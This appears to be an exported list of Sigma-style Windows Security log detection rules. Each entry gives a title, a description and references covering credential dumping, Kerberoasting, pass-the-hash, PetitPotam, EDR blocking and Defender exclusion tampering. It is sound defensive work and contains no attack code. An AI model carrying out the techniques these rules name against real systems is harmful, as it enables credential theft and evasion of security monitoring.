DPAPI Domain Master Key Backup Attempt Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller. https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
External Disk Drive Or USB Storage Device Was Recognized By The System Detects external disk drives or plugged-in USB devices. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416
Persistence and Execution at Scale via GPO Scheduled Task Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale https://twitter.com/menasec1/status/1106899890377052160, https://www.secureworks.com/blog/ransomware-as-a-distraction, https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html
Hidden Local User Creation Detects the creation of a local hidden user account which should not happen for event ID 4720. https://twitter.com/SBousseaden/status/1387743867663958021
HackTool - EDRSilencer Execution - Filter Added Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names. https://github.com/netero1010/EDRSilencer
HackTool - NoFilter Execution Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp, https://github.com/deepinstinct/NoFilter, https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation, https://x.com/_st0pp3r_/status/1742203752361128162?s=20
HybridConnectionManager Service Installation Rule to detect the Hybrid Connection Manager service installation. https://twitter.com/Cyb3rWard0g/status/1381642789369286662
Impacket PsExec Execution Detects execution of Impacket's psexec.py. https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
Possible Impacket SecretDump Remote Activity Detect AD credential dumping using impacket secretdump HKTL https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
Invoke-Obfuscation CLIP+ Launcher - Security Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation - Security Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher - Security Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher - Security Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION - Security Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER - Security Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin - Security Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip - Security Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA - Security Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 - Security Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
ISO Image Mounted Detects the mount of an ISO image on an endpoint https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore, https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages, https://twitter.com/MsftSecIntel/status/1257324139515269121, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image
Kerberoasting Activity - Initial Query This rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert. https://www.trustedsec.com/blog/art_of_kerberoast/, https://adsecurity.org/?p=3513
First Time Seen Remote Named Pipe This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes https://twitter.com/menasec1/status/1104489274387451904
LSASS Access From Non System Account Detects potential mimikatz-like tools accessing LSASS from non system account https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html
Credential Dumping Tools Service Execution - Security Detects well-known credential dumping tools execution via service execution events https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
WCE wceaux.dll Access Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
Metasploit SMB Authentication Alerts on Metasploit host's authentications on the domain. https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb
Metasploit Or Impacket Service Installation Via SMB PsExec Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation https://bczyz1.github.io/2021/01/30/psexec.html
Meterpreter or Cobalt Strike Getsystem Service Installation - Security Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
NetNTLM Downgrade Attack Detects NetNTLM downgrade attack https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
Windows Network Access Suspicious desktop.ini Action Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
New or Renamed User Account with '$' Character Detects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms. https://twitter.com/SBousseaden/status/1387743867663958021
Denied Access To Remote Desktop This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network. https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825
Password Policy Enumerated Detects when the password policy is enumerated. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661, https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951
Windows Pcap Drivers Detects Windows Pcap driver installation based on a list of associated .sys files. https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more
Possible PetitPotam Coerce Authentication Attempt Detect PetitPotam coerced authentication activity. https://github.com/topotam/PetitPotam, https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml
PetitPotam Suspicious Kerberos TGT Request Detect suspicious Kerberos TGT requests. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts. https://github.com/topotam/PetitPotam, https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/, https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml
Possible DC Shadow Attack Detects DCShadow via create new SPN https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48
PowerShell Scripts Installed as Services - Security Detects powershell script installed as a Service https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Protected Storage Service Access Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
RDP over Reverse SSH Tunnel WFP Detects svchost hosting RDP termsvcs communicating with the loopback address https://twitter.com/SBousseaden/status/1096148422984384514, https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx
Register new Logon Process by Rubeus Detects potential use of Rubeus via registered new trusted logon process https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
Service Registry Key Read Access Request Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness
Remote PowerShell Sessions Network Connections (WinRM) Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986 https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Replay Attack Detected Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649
SAM Registry Hive Handle Request Detects handles requested to SAM registry hive https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html
SCM Database Handle Failure Detects non-system users failing to get a handle of the SCM database. https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html
SCM Database Privileged Operation Detects non-system users performing privileged operation os the SCM database https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html
Potential Secure Deletion with SDelete Detects files that have extensions commonly seen while SDelete is used to wipe files. https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm, https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete
Service Installed By Unusual Client - Security Detects a service installed by a client which has PID 0 or whose parent has PID 0 https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html, https://www.x86matthew.com/view_post?id=create_svc_rpc, https://twitter.com/SBousseaden/status/1490608838701166596
Remote Access Tool Services Have Been Installed - Security Detects service installation of different remote access tools software. These software are often abused by threat actors to perform https://redcanary.com/blog/misbehaving-rats/
SMB Create Remote File Admin Share Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$). https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml, https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file
A New Trust Was Created To A Domain Addition of domains is seldom and should be verified for legitimacy. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706
Win Susp Computer Name Containing Samtheadmin Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool https://twitter.com/malmoeb/status/1511760068743766026, https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py, https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py
Addition of SID History to Active Directory Object An attacker can use the SID history attribute to gain additional privileges. https://adsecurity.org/?p=1772
Password Change on Directory Service Restore Mode (DSRM) Account Detects potential attempts made to set the Directory Services Restore Mode administrator password. The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password in order to obtain persistence. https://adsecurity.org/?p=1714, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794
Account Tampering - Suspicious Failed Logon Reasons This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625, https://twitter.com/SBousseaden/status/1101431884540710913
Group Policy Abuse for Privilege Addition Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins. https://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275
Startup/Logon Script Added to Group Policy Object Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects. https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html
Kerberos Manipulation Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771
Suspicious LDAP-Attributes Used Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies. https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961, https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/, https://github.com/fox-it/LDAPFragger
Suspicious Windows ANONYMOUS LOGON Local Account Created Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts. https://twitter.com/SBousseaden/status/1189469425482829824
Password Dumper Activity on LSASS Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN https://twitter.com/jackcr/status/807385668833968128
Suspicious Remote Logon with Explicit Credentials Detects suspicious processes logging on with explicit credentials https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Potentially Suspicious AccessMask Requested From LSASS Detects process handle on LSASS process with certain access mask https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Reconnaissance Activity Detects activity as "net user administrator /domain" and "net group domain admins /domain" https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html
Password Protected ZIP File Opened Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. https://twitter.com/sbousseaden/status/1523383197513379841
Password Protected ZIP File Opened (Suspicious Filenames) Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened. https://twitter.com/sbousseaden/status/1523383197513379841
Password Protected ZIP File Opened (Email Attachment) Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. https://twitter.com/sbousseaden/status/1523383197513379841
Uncommon Outbound Kerberos Connection - Security Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. https://github.com/GhostPack/Rubeus
Possible Shadow Credentials Added Detects possible addition of shadow credentials to an active directory object. https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html, https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/, https://twitter.com/SBousseaden/status/1581300963650187264?
Suspicious PsExec Execution detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
Suspicious Access to Sensitive File Extensions Detects known sensitive file extensions accessed on a network share Internal Research
Suspicious Kerberos RC4 Ticket Encryption Detects service ticket requests using RC4 encryption type https://adsecurity.org/?p=3458, https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity
Suspicious Scheduled Task Creation Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698
Important Scheduled Task Deleted/Disabled Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701
Suspicious Scheduled Task Update Detects update to a scheduled task event that contain suspicious keywords. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698
Unauthorized System Time Modification Detect scenarios where a potentially unauthorized application or user is modifying the system time. Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well), Live environment caused by malware, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616
Remote Service Activity via SVCCTL Named Pipe Detects remote service activity via remote access to the svcctl named pipe https://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
SysKey Registry Keys Access Detects handle requests and access operations to specific registry keys to calculate the SysKey https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html
Sysmon Channel Reference Deletion Potential threat actor tampering with Sysmon manifest and eventually disabling it https://twitter.com/Flangvik/status/1283054508084473861, https://twitter.com/SecurityJosh/status/1283027365770276866, https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html, https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8
Tap Driver Installation - Security Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques. https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers
Suspicious Teams Application Related ObjectAcess Event Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
Transferring Files with Credential Data via Network Shares Transferring files with well-known filenames (sensitive files with credential data) using network shares https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
User Added to Local Administrator Group Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732, https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA. https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
Local User Creation Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs. https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/
Potential Privileged System Service Operation - SeLoadDriverPrivilege Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff. https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673
User Logoff Event Detects a user log-off activity. Could be used for example to correlate information during forensic investigations https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647
VSSAudit Security Event Source Registration Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
Windows Defender Exclusion List Modified Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security. https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
Windows Defender Exclusion Deleted Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
T1047 Wmiprvse Wbemcomn DLL Hijack Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html
Locked Workstation Detects locked workstation session events that occur automatically after a standard period of inactivity. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800
WMI Persistence - Security Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. https://twitter.com/mattifestation/status/899646620148539397, https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
Windows Defender Exclusion Registry Key - Write Access Requested Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security. https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
Admin User Remote Logon Detect remote login by Administrator user (depending on internal pattern). https://car.mitre.org/wiki/CAR-2016-04-005
DiagTrackEoP Default Login Username Detects the default "UserName" used by the DiagTrackEoP POC https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46
A Member Was Removed From a Security-Enabled Global Group Detects activity when a member is removed from a security-enabled global group https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633
Potential Access Token Abuse Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag". https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation, https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html
RDP Login from Localhost RDP login with localhost source address may be a tunnelled login https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
Successful Overpass the Hash Attempt Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html
Scanner PoC for CVE-2019-0708 RDP RCE Vuln Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep https://twitter.com/AdamTheAnalyst/status/1134394070045003776, https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708
A Member Was Added to a Security-Enabled Global Group Detects activity when a member is added to a security-enabled global group https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632
A Security-Enabled Global Group Was Deleted Detects activity when a security-enabled global group is deleted https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634
External Remote RDP Logon from Public IP Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port. https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html, https://twitter.com/Purp1eW0lf/status/1616144561965002752
Pass the Hash Activity 2 Detects the attack technique pass the hash which is used to move laterally inside the network https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events, https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis, https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/
External Remote SMB Logon from Public IP Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port. https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html, https://twitter.com/Purp1eW0lf/status/1616144561965002752
Failed Logon From Public IP Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625
Potential Privilege Escalation via Local Kerberos Relay over LDAP Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges. https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g, https://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38
Outgoing Logon with New Credentials Detects logon events that specify new credentials https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf
RottenPotato Like Attack Pattern Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like https://twitter.com/SBousseaden/status/1195284233729777665
Successful Account Login Via WMI Detects successful logon attempts performed with WMI Internal Research
Windows Filtering Platform Blocked Connection From EDR Agent Binary Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events. https://github.com/netero1010/EDRSilencer, https://github.com/amjcyber/EDRNoiseMaker, https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983
Microsoft Defender Blocked from Loading Unsigned DLL Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
Unsigned Binary Loaded From Suspicious Location Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv
HybridConnectionManager Service Running Rule to detect the Hybrid Connection Manager service running on an endpoint. https://twitter.com/Cyb3rWard0g/status/1381642789369286662
Suspicious Application Installed Detects suspicious application installed by looking at the added shortcut to the app resolver cache https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3
Suspicious Rejected SMB Guest Logon From IP Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service https://twitter.com/KevTheHermit/status/1410203844064301056, https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare
Sysmon Application Crashed Detects application popup reporting a failure of the Sysmon service https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36
NTLMv1 Logon Between Client and Server Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware. https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml
